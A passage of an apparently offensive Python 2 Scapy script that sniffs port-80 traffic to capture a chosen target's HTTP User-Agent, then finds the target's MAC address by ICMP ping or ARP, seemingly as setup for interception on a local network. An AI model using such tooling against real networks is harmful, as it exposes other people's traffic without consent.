self.user_agents[pkt[IP].src] = pkt[Raw].load[:pkt[Raw].load.find("\n")]
print "%s -- User Agent:\n%s\n" % (target, self.user_agents[pkt[IP].src])
def run(self):
sniff(prn = self.listen, filter="port 80")
try:
target = str(raw_input("Target \\\: "))
if not "." in target: exit()
if target == my_ip: exit("You cant set the Target to Your IP\nYou " + my_ip + " Target " + target)
try:
ans = srp1(Ether(src=my_mac)/IP(src=my_ip, dst=target)/ICMP(type=8), timeout=5)
if ans:
target_mac = ans[Ether].src
except Exception as prblm:
exit(prblm)
if not target_mac:
try:
ans, unans = srp(Ether()/ARP(op=1, psrc=my_ip, pdst=target), timeout=5)
if len(ans) == 0:
print "Looks like %s is Inactive or not Online" % target
target_mac = str(raw_input("Target Mac-Address \\\: "))
else:
target_mac = ans[0][1].src
except Exception as resolv_prblm:
exit(resolv_prblm)
